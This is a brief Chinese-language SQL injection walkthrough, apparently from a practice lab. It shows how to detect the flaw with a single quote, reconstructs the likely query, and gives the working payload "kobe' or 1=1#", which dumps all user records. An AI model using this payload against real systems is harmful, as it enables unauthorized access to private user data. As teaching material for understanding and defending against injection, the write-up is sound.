输入单引号,出现错误回显,说明存在sql注入风险
2.由于是字符类型输入,猜测sql语句应为
select email from usertable where username='kobe'
构造闭合,payload为 kobe' or 1=1#
单引号与select email from usertable where username='kobe' 构成闭合,or 1=1 条件恒成立。#注释掉了后面的第二个引号select email from usertable where username='kobe'
成功查到了数据库中所有的用户信息